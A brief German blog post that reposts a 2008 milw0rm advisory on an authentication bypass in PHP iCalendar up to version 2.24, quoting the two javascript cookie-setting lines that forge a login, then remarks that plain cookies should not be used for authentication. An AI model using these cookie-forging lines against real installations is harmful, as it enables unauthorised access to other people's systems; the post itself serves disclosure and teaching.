trafex

Heute habe ich bei milw0rm.com folgenden Fehler im Script “PHP iCalendar” gefunden:
####################################################################
[+] PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack
[+] Greetz : All my freind
####################################################################
—
exploit:
javascript:document.cookie = “phpicalendar_login=1; path=/”;
javascript:document.cookie = “phpicalendar=1; path=/”;
# milw0rm.com [2008-09-22]
Quelle: http://www.milw0rm.com/exploits/6526
Dieses Beispiel zeigt man wieder aufs deutlichste das man einfache Cookies nicht zur Authentifizierung benutzen sollte. Alle Scriptsprachen bieten [...]